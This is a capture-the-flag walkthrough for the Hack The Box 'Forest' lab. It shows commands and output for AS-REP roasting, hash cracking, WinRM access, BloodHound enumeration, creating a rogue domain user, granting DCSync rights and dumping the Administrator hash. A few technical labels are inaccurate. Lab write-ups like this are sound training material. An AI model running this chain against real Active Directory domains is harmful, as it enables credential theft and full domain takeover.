Post

HTB - Forest

HTB: Forest

Forest Box

Walkthrough Summary

StepActionToolAchieved
1ASREPRoastingGetNPUsers.pyObtained the TGT ticket of svc-alfresco
2Hash crackedHashcatObtained clear text password
3Logged into the domain via WinRMevil-winrmObtained initial foothold
4Credentialed domain enumerationSharpHound.py, BloodHoundEnumerated privilege escalation path
5Executed privileged escalation pathLOTL*Created & added a domain user to the required groups
6Assiged user DCSync rightsDCSync.pyObtained administrator’s NTLMv2 hash
7DCSync attacksecretsdump.pyCompromised domain

*Living Off The Land

Attack Chain Reproduction Steps

Obtained the TGT ticket of svc-alfresco via ASREPRoasting:

1
2
3
4
5
6
7
8
$ getnpusers -dc-ip 10.10.10.161 -request 'htb.local/'
Impacket v0.12.0.dev1+20231027.123703.c0e949fe - Copyright 2023 Fortra

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2024-03-15 17:01:22.890339  2024-03-15 16:37:07.184448  0x410200

$krb5asrep$23$svc-alfresco@HTB.LOCAL:1f1...<REDACTED>...588

Cracked the password hash offline:

1
2
3
4
5
6
7
$ hashcat -m 18200 svc-alfresco_tgt /usr/share/wordlists/rockyou.txt

<SNIP>

$krb5asrep$23$svc-alfresco@HTB.LOCAL:1f1...<REDACTED>...588:s<REDACTED>e

<SNIP>

The obtained credentials was subsequently domain-confirmed via NetExec:

1
2
3
4
$ nxc smb 10.10.10.161 -u svc-alfresco -p s<REDACTED>e
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [+] htb.local\svc-alfresco:s<REDACTED>e
https://github.com/Pennyw0rth/NetExec

An initial foothold to the domain was achieved:

1
2
3
4
5
$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s<REDACTED>e

<SNIP>

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

The user.txt file was compromised:

1
2
*Evil-WinRM* PS C:\Users\svc-alfresco> type desktop\user.txt
5a4<REDACTED>f85

Domain information was collected and then transferred to the attack host:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\svc-alfresco> upload SharpHound.exe

Info: Uploading /home/kali/htb/forest/SharpHound.exe to C:\Users\svc-alfresco\SharpHound.exe

Data: 965288 bytes of 965288 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco> .\SharpHound.exe -c All

*Evil-WinRM* PS C:\Users\svc-alfresco> download 20240315124803_htblocal.zip

Info: Downloading C:\Users\svc-alfresco\20240315124803_htblocal.zip to 20240315124803_htblocal.zip

Info: Download successful!

Upon review, two issues stood out:

  • svc-alfresco was member of the Account Operators group as a result of group nesting (Figure 1)
  • The Windows Exchange Permissions group had WriteDACL permissions over the HTB.LOCAL domain, which means that its members can obtain DCSync rights (Figure 2)

Figure 1: svc-alfresco is a part of the Account Operators group.

Figure 2: The Windows Exchange Permissions group has WriteDACL rights over HTB.LOCAL.

Based on the above information, a new domain user account was created and added to the Windows Exchange Permissions and the Remote Management Users group (to allow WinRM remote management):

1
2
3
4
5
6
7
8
9
10
# create a new domain user
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user /domain hacker hack3r123 /add
The command completed successfully.

# add user to the groups
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group /domain "Exchange Windows Permissions" hacker /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" /add hacker
The command completed successfully.

The user was then assigned the DCSync rights:

1
2
3
4
5
6
7
8
9
10
11
12
13
$ sudo python3 DCSync.py -dc htb.local -t ''CN=hacker,CN=Users,DC=htb,DC=local'' ''htb.local\hacker:hack3r123''
Impacket v0.12.0.dev1+20231027.123703.c0e949fe - Copyright 2023 Fortra

[*] Starting DCSync Attack against CN=hacker,CN=Users,DC=htb,DC=local
[*] Initializing LDAP connection to htb.local
[*] Using htb.local\hacker account with password ***
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Querying domain security descriptor
[*] Success! User hacker now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20240316-103635.restore

The DCSync attack was performed and the Administrator’s NTLMv2 hash was obtained:

1
2
3
4
5
6
7
8
9
$ sudo /opt/impacket/examples/secretsdump.py htb.local/hacker:hack3r123@10.10.10.161
Impacket v0.12.0.dev1+20231027.123703.c0e949fe - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad<REDACTED>4ee:326<REDACTED>ea6:::
<SNIP>
[*] Cleaning up...

The obtained hash was used to log in as Administrator and achieve full domain compromise by obtaining the root.txt file:

1
2
3
4
5
6
$ evil-winrm -i 10.10.10.161 -u administrator -p aad<REDACTED>ea6

<SNIP>

*Evil-WinRM* PS C:\Users\Administrator\Documents> *Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\desktop\root.txt
58a<REDACTED>525
This post is licensed under CC BY 4.0 by the author.